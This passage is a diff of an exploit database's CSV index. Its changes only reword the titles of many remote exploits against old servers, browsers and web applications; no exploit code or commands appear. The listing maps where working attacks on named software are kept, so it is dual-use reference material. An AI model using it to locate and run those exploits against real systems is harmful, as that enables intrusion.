-19561,platforms/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x - Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",windows,remote,0 +19561,platforms/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x - Mail Server Multiple Buffer Overflows",1999-10-01,"Arne Vidstrom",windows,remote,0 19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPd 1.1/2.4 Pro - Buffer Overflow",1999-10-22,UNYUN,windows,remote,0 19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0 19568,platforms/windows/remote/19568.txt,"pacific software url live! 1.0 - Directory Traversal",1999-10-28,UNYUN,windows,remote,0 @@ -12366,7 +12367,7 @@ id,file,description,date,author,platform,type,port 20516,platforms/multiple/remote/20516.txt,"BEA Systems WebLogic Server 4.0 x/4.5 x/5.1 x - Double Dot Buffer Overflow",2000-12-19,peter.grundl,multiple,remote,0 20519,platforms/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 - Fast Mode TCP Fragment",2000-12-14,"Thomas Lopatic",multiple,remote,0 20522,platforms/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' File Disclosure",2000-12-23,bt,cgi,remote,0 -20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution and File Disclosure",2000-12-27,Ksecurity,cgi,remote,0 +20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Command Execution / File Disclosure",2000-12-27,Ksecurity,cgi,remote,0 20524,platforms/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0 20525,platforms/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0 20527,platforms/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access",2000-12-30,isno,cgi,remote,0 @@ -12597,7 +12598,7 @@ id,file,description,date,author,platform,type,port 21030,platforms/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0 21034,platforms/windows/remote/21034.rb,"SAP NetWeaver Dispatcher - DiagTraceR3Info Buffer Overflow (Metasploit)",2012-09-07,Metasploit,windows,remote,3200 21035,platforms/windows/remote/21035.txt,"SnapStream PVS 1.2 - Plaintext Password",2001-07-26,John,windows,remote,0 -21036,platforms/windows/remote/21036.pl,"Ipswitch WS_FTP Server 2.0 - Anonymous Multiple FTP Command Buffer Overflow",2001-07-25,andreas,windows,remote,0 +21036,platforms/windows/remote/21036.pl,"Ipswitch WS_FTP Server 2.0 - Anonymous Multiple FTP Command Buffer Overflows",2001-07-25,andreas,windows,remote,0 21037,platforms/linux/remote/21037.c,"GNU groff 1.1x - xploitation Via LPD",2001-06-23,zen-parse,linux,remote,0 21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 - Hex Encoded URL Directory Traversal",2001-07-26,THRAN,windows,remote,0 21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x - Buffer Overflow (1)",1997-04-23,savage,linux,remote,0 @@ -12780,7 +12781,7 @@ id,file,description,date,author,platform,type,port 21576,platforms/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - 'ext.dll' Cross-Site Scripting",2002-06-23,"Matthew Murphy",windows,remote,0 21578,platforms/unix/remote/21578.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (1)",2002-06-24,"Christophe Devine",unix,remote,0 21579,platforms/unix/remote/21579.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (2)",2002-06-24,"Gobbles Security",unix,remote,0 -21581,platforms/windows/remote/21581.txt,"Summit Computer Networks Lil' HTTP Server 2 - URLCount.cgi HTML Injection",2002-06-27,"Matthew Murphy",windows,remote,0 +21581,platforms/windows/remote/21581.txt,"Summit Computer Networks Lil' HTTP Server 2 - 'URLCount.cgi' HTML Injection",2002-06-27,"Matthew Murphy",windows,remote,0 21582,platforms/windows/remote/21582.txt,"Macromedia JRun 3/4 - Administrative Authentication Bypass",2002-06-28,"Matt Moore",windows,remote,0 21586,platforms/linux/remote/21586.txt,"E-Guest 1.1 - Server Side Include Arbitrary Command Execution",2002-06-30,DownBload,linux,remote,0 21589,platforms/windows/remote/21589.pl,"AnalogX Proxy 4.0 - Socks4A Buffer Overflow",2002-07-01,Kanatoko,windows,remote,0 @@ -12797,7 +12798,7 @@ id,file,description,date,author,platform,type,port 21606,platforms/windows/remote/21606.txt,"Microsoft Internet Explorer 5/6 - OBJECT Tag Same Origin Policy Violation",2002-07-10,"Thor Larholm",windows,remote,0 21607,platforms/windows/remote/21607.txt,"GoAhead Web Server 2.1.x - URL Encoded Slash Directory Traversal",2002-07-10,"Matt Moore",windows,remote,0 21608,platforms/windows/remote/21608.txt,"GoAhead Web Server 2.1.x - Error Page Cross-Site Scripting",2002-07-10,"Matt Moore",windows,remote,0 -21611,platforms/windows/remote/21611.txt,"Summit Computer Networks Lil' HTTP Server 2.1/2.2 - pbcgi.cgi Cross-Site Scripting",2002-07-11,"Matthew Murphy",windows,remote,0 +21611,platforms/windows/remote/21611.txt,"Summit Computer Networks Lil' HTTP Server 2.1/2.2 - 'pbcgi.cgi' Cross-Site Scripting",2002-07-11,"Matthew Murphy",windows,remote,0 21613,platforms/windows/remote/21613.txt,"Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)",2002-07-12,JWC,windows,remote,0 21614,platforms/freebsd/remote/21614.c,"ATPhttpd 0.4b - Buffer Overflow",2002-07-12,badc0ded,freebsd,remote,0 21615,platforms/windows/remote/21615.c,"Real Networks RealJukebox 1.0.2/RealOne 6.0.10 Player Gold - Skinfile Buffer Overflow",2002-07-12,UNYUN,windows,remote,0 @@ -13124,8 +13125,8 @@ id,file,description,date,author,platform,type,port 22664,platforms/windows/remote/22664.txt,"Sun ONE Application Server 7.0 - Source Disclosure",2003-05-27,"SPI Labs",windows,remote,0 22665,platforms/windows/remote/22665.txt,"Sun ONE Application Server 7.0 - Error Message Cross-Site Scripting",2003-05-27,"SPI Labs",windows,remote,0 22674,platforms/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 - Full Path Disclosure",2003-05-29,JeiAr,windows,remote,0 -22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe css' Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 -22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe css' Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 +22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe?css' Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 +22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe?css' Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0 22686,platforms/php/remote/22686.rb,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit)",2012-11-13,Metasploit,php,remote,0 22691,platforms/windows/remote/22691.txt,"pablo software Solutions baby ftp server 1.2 - Directory Traversal",2003-05-29,dr_insane,windows,remote,0 @@ -13433,7 +13434,7 @@ id,file,description,date,author,platform,type,port 23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 - Error Page Cross-Site Scripting",2004-02-26,Soby,hardware,remote,0 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage",2004-02-27,iDefense,windows,remote,0 23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6 - window.open Media Bar Cross-Zone Scripting",2003-09-11,Jelmer,windows,remote,0 -23771,platforms/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x - Multiple Format String",2004-03-01,"Ulf Harnhammar",linux,remote,0 +23771,platforms/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x - Multiple Format String Vulnerabilities",2004-03-01,"Ulf Harnhammar",linux,remote,0 23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Overflow",2004-03-01,CMN,linux,remote,0 23776,platforms/windows/remote/23776.txt,"Software602 602Pro LAN Suite - Web Mail Cross-Site Scripting",2004-03-01,"Rafel Ivgi The-Insider",windows,remote,0 23777,platforms/linux/remote/23777.txt,"Squid Proxy 2.4/2.5 - NULL URL Character Unauthorized Access",2004-03-01,"Mitch Adair",linux,remote,0 @@ -13521,8 +13522,8 @@ id,file,description,date,author,platform,type,port 24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,multiple,remote,0 24159,platforms/linux/remote/24159.rb,"Nagios3 - history.cgi Host Command Execution (Metasploit)",2013-01-16,Metasploit,linux,remote,0 24160,platforms/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote,0 -24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - 'show.asp' show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 -24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - 'showperf.asp' title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 +24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - 'show.asp?show' Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 +24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - 'showperf.asp?title' Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - 'showini.asp' Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0 24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0 24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0 @@ -13567,8 +13568,8 @@ id,file,description,date,author,platform,type,port 24326,platforms/cgi/remote/24326.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",cgi,remote,0 24327,platforms/cgi/remote/24327.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Arbitrary File Access",2004-07-27,"Phil Robinson",cgi,remote,0 24328,platforms/windows/remote/24328.txt,"Microsoft Internet Explorer 5.0.1 - Style Tag Comment Memory Corruption",2004-07-08,"Phuong Nguyen",windows,remote,0 -24336,platforms/cgi/remote/24336.txt,"MyServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting",2004-07-30,dr_insane,cgi,remote,0 -24337,platforms/cgi/remote/24337.txt,"myServer 0.6.2 - math_sum.mscgi Multiple Parameter Remote Overflow",2004-07-30,dr_insane,cgi,remote,0 +24336,platforms/cgi/remote/24336.txt,"MyServer 0.6.2 - 'math_sum.mscgi' Multiple Cross-Site Scripting Vulnerabilities",2004-07-30,dr_insane,cgi,remote,0 +24337,platforms/cgi/remote/24337.txt,"myServer 0.6.2 - 'math_sum.mscgi' Multiple Remote Overflows",2004-07-30,dr_insane,cgi,remote,0 24338,platforms/linux/remote/24338.c,"Citadel/UX 5.9/6.x - 'Username' Buffer Overflow (1)",2004-07-30,CoKi,linux,remote,0 24339,platforms/linux/remote/24339.c,"Citadel/UX 5.9/6.x - 'Username' Buffer Overflow (2)",2004-07-30,Nebunu,linux,remote,0 24342,platforms/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 - 'sresult.exe' Cross-Site Scripting",2004-08-02,dr_insane,cgi,remote,0 @@ -13585,8 +13586,8 @@ id,file,description,date,author,platform,type,port 24409,platforms/windows/remote/24409.txt,"Working Resources BadBlue 1.7.x/2.x - Unauthorized Proxy Relay",2002-12-11,Texonet,windows,remote,0 24413,platforms/windows/remote/24413.txt,"NullSoft Winamp 2.4 < 5.0.4 - '.wsz' Remote Code Execution",2004-07-26,anonymous,windows,remote,0 24414,platforms/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant",2004-08-26,"GulfTech Security",multiple,remote,0 -24417,platforms/windows/remote/24417.txt,"Xedus Web Server 1.0 - test.x 'Username' Parameter Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0 -24418,platforms/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x 'Username' Parameter Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0 +24417,platforms/windows/remote/24417.txt,"Xedus Web Server 1.0 - test.x 'Username' Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0 +24418,platforms/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x 'Username' Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0 24419,platforms/windows/remote/24419.txt,"Xedus Web Server 1.0 - Traversal Arbitrary File Access",2004-09-30,"James Bercegay",windows,remote,0 24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (Metasploit) (1)",2013-02-06,Metasploit,windows,remote,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails - JSON Processor YAML Deserialization Code Execution (Metasploit)",2013-01-29,Metasploit,multiple,remote,0 @@ -13621,7 +13622,7 @@ id,file,description,date,author,platform,type,port 24607,platforms/windows/remote/24607.txt,"Google Toolbar 1.1.x - About.HTML HTML Injection",2004-09-17,ViperSV,windows,remote,0 24622,platforms/linux/remote/24622.c,"LaTeX2rtf 1.9.15 - Remote Buffer Overflow",2004-09-21,"D. J. Bernstein",linux,remote,0 24623,platforms/windows/remote/24623.txt,"Sophos Anti-Virus 3.x - Reserved MS-DOS Name Scan Evasion",2004-09-22,"Kurt Seifried",windows,remote,0 -24624,platforms/windows/remote/24624.c,"Alt-N MDaemon 6.5.1 SMTP Server - Multiple Command Remote Overflow",2004-09-16,D_BuG,windows,remote,0 +24624,platforms/windows/remote/24624.c,"Alt-N MDaemon 6.5.1 SMTP Server - Multiple Command Remote Overflows",2004-09-16,D_BuG,windows,remote,0 24653,platforms/windows/remote/24653.txt,"VyPRESS Messenger 3.5 - Remote Buffer Overflow",2004-10-01,"Luigi Auriemma",windows,remote,0 24654,platforms/multiple/remote/24654.txt,"Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation",2004-10-04,"Eric Lackey",multiple,remote,0 24656,platforms/php/remote/24656.txt,"PHP 4.x/5.0.1 - PHP_Variables Remote Memory Disclosure",2004-09-15,"Stefano Di Paola",php,remote,0 @@ -13782,7 +13783,7 @@ id,file,description,date,author,platform,type,port 25275,platforms/linux/remote/25275.c,"Smail 3 - Multiple Remote/Local Vulnerabilities",2005-03-25,infamous42md,linux,remote,0 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library - Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0 25775,platforms/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80 -25297,platforms/linux/remote/25297.txt,"Dovecot with Exim - 'sender_address' Parameter Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 +25297,platforms/linux/remote/25297.txt,"Dovecot with Exim - 'sender_address' Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 25319,platforms/windows/remote/25319.txt,"FastStone 4in1 Browser 1.2 - Web Server Directory Traversal",2005-03-29,"Donato Ferrante",windows,remote,0 25321,platforms/linux/remote/25321.c,"YepYep MTFTPD 0.2/0.3 - Remote CWD Argument Format String",2005-03-30,gunzip,linux,remote,0 25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0 @@ -13850,7 +13851,7 @@ id,file,description,date,author,platform,type,port 25698,platforms/windows/remote/25698.txt,"Blue Coat Reporter 7.0/7.1 - License HTML Injection",2005-05-24,"Oliver Karow",windows,remote,0 25706,platforms/linux/remote/25706.cpp,"GNU Mailutils 0.6 - Mail Email Header Buffer Overflow",2004-08-10,infamous41md,linux,remote,0 25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server - Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote,0 -25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - Read_TCP_String Remote Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote,0 +25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - 'Read_TCP_String' Remote Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote,0 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution",2013-05-26,rgod,windows,remote,0 25755,platforms/windows/remote/25755.txt,"ServersCheck 5.9/5.10 - Directory Traversal",2005-05-30,rgod,windows,remote,0 33414,platforms/php/remote/33414.php,"PHP 5.2.11 - 'htmlspecialCharacters()' Malformed Multibyte Character Cross-Site Scripting (1)",2009-12-17,hello@iwamot.com,php,remote,0 @@ -13909,9 +13910,9 @@ id,file,description,date,author,platform,type,port 26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger - ActiveX Control Information Disclosure",2005-09-05,"Gregory R. Panakkal",windows,remote,0 26230,platforms/windows/remote/26230.txt,"Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure",2005-09-04,"Inge Henriksen",windows,remote,0 26306,platforms/windows/remote/26306.txt,"NateOn Messenger 3.0 - Arbitrary File Download / Buffer Overflow",2005-09-29,saintlinu,windows,remote,0 -26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - 'wwv_flow.accept p_t02' Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 +26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - 'wwv_flow.accept?p_t02' Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 26318,platforms/hardware/remote/26318.py,"TP-Link PS110U Print Server TL - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0 -26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 - 'f?p=' Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 +26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 - 'f?p=' Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 26374,platforms/windows/remote/26374.txt,"Xerver 4.17 - Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote,0 26375,platforms/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote,0 26376,platforms/windows/remote/26376.txt,"Xerver 4.17 Server - URI Null Character Cross-Site Scripting",2005-10-19,"Ziv Kamir",windows,remote,0 @@ -13950,7 +13951,7 @@ id,file,description,date,author,platform,type,port 27012,platforms/windows/remote/27012.rb,"Apple QuickTime 7 - Invalid Atom Length Buffer Overflow (Metasploit)",2013-07-22,Metasploit,windows,remote,0 27013,platforms/windows/remote/27013.rb,"HP Managed Printing Administration - jobAcct Remote Command Execution (Metasploit)",2013-07-22,Metasploit,windows,remote,0 27024,platforms/windows/remote/27024.txt,"EFileGo 3.0 - Multiple Input Validation Vulnerabilities",2006-01-03,dr_insane,windows,remote,0 -27032,platforms/linux/remote/27032.txt,"Hylafax 4.1/4.2 - Multiple Scripts Remote Command Execution",2006-01-05,"Patrice Fournier",linux,remote,0 +27032,platforms/linux/remote/27032.txt,"Hylafax 4.1/4.2 (Multiple Scripts) - Remote Command Execution",2006-01-05,"Patrice Fournier",linux,remote,0 27044,platforms/hardware/remote/27044.rb,"D-Link Devices - UPnP SOAP Command Execution (Metasploit)",2013-07-23,Metasploit,hardware,remote,0 27045,platforms/linux/remote/27045.rb,"Foreman (RedHat OpenStack/Satellite) - bookmarks/create Code Injection (Metasploit)",2013-07-23,Metasploit,linux,remote,443 27046,platforms/windows/remote/27046.rb,"VMware vCenter - Chargeback Manager ImageUploadServlet Arbitrary File Upload (Metasploit)",2013-07-23,Metasploit,windows,remote,443 @@ -13958,15 +13959,15 @@ id,file,description,date,author,platform,type,port 27073,platforms/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,windows,remote,0 27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - Sample Script cal2.jsp time Parameter Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0 27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 - Error Page Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0 -27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution",2013-07-27,"Jacob Holcomb",linux_mips,remote,0 +27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - 'acsd' Remote Command Execution",2013-07-27,"Jacob Holcomb",linux_mips,remote,0 27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)",2013-07-27,Metasploit,multiple,remote,8080 27150,platforms/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting",2006-01-30,"Chris Thomas",linux,remote,0 27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes JavaScript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 27182,platforms/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes - Email Subject Cross-Site Scripting",2006-02-10,"Jakob Balle",multiple,remote,0 27203,platforms/hardware/remote/27203.pl,"Fortinet Fortigate 2.x/3.0 - URL Filtering Bypass",2006-02-13,"Mathieu Dessus",hardware,remote,0 -27233,platforms/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp fullName' Parameter Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote,0 -27234,platforms/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 - 'deleteSingle fullName' Parameter Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote,0 -27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 - 'adapter-index.dsp url' Parameter Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 +27233,platforms/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp?fullName' Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote,0 +27234,platforms/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 - 'deleteSingle?fullName' Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote,0 +27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 - 'adapter-index.dsp?url' Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,linux,remote,0 27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0 27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 @@ -14032,8 +14033,8 @@ id,file,description,date,author,platform,type,port 33405,platforms/multiple/remote/33405.txt,"APC Network Management Card - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-15,"Jamal Pecou",multiple,remote,0 27851,platforms/windows/remote/27851.bat,"Microsoft Windows - Path Conversion",2006-05-10,"Mario Ballano Bárcena",windows,remote,0 27852,platforms/multiple/remote/27852.pl,"Symantec Enterprise Firewall / Gateway Security - HTTP Proxy Internal IP Leakage",2006-05-10,"Bernhard Mueller",multiple,remote,0 -27861,platforms/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/Navigation.asp sDeviceView Parameter Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 -27862,platforms/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/ToolResults.asp sHostname Parameter Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 +27861,platforms/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - 'NmConsole/Navigation.asp?sDeviceView' Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 +27862,platforms/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - 'NmConsole/ToolResults.asp?sHostname' Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 27873,platforms/hardware/remote/27873.txt,"Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution (PoC)",2013-08-26,Aodrulez,hardware,remote,0 27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server - Remote Command Execution (Metasploit)",2013-08-26,Metasploit,windows,remote,7770 27887,platforms/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 - Input Validation",2005-11-09,"Arnold Grossmann",multiple,remote,0 @@ -14068,8 +14069,8 @@ id,file,description,date,author,platform,type,port 28188,platforms/windows/remote/28188.rb,"HP SiteScope (Windows) - Remote Code Execution (Metasploit)",2013-09-10,Metasploit,windows,remote,8080 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,windows,remote,0 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,windows,remote,0 -28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - player.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 -28210,platforms/multiple/remote/28210.txt,"FLV Players 8 - popup.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 +28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - 'player.php?url' Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 +28210,platforms/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' .PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe' Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 @@ -14196,8 +14197,8 @@ id,file,description,date,author,platform,type,port 30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp - Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",windows,remote,0 30018,platforms/linux/remote/30018.py,"Python 2.5 - 'PyLocale_strxfrm' Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 -30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and 'InoCore.dll' - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 -30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 +30019,platforms/windows/remote/30019.c,"CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 +30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 (Multiple Scripts) - Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal",2007-05-11,"Digital Defense",windows,remote,0 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote,0 29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 - '.m3u' Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0 @@ -14233,13 +14234,13 @@ id,file,description,date,author,platform,type,port 29770,platforms/linux/remote/29770.txt,"KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 29771,platforms/windows/remote/29771.txt,"Microsoft Windows Vista - Windows Mail Local File Execution",2007-03-23,kingcope,windows,remote,0 29784,platforms/php/remote/29784.php,"PHP 5.2.1 - Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",php,remote,0 -29785,platforms/php/remote/29785.txt,"aBitWhizzy - 'whizzypic.php d' ParameterTraversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 +29785,platforms/php/remote/29785.txt,"aBitWhizzy - 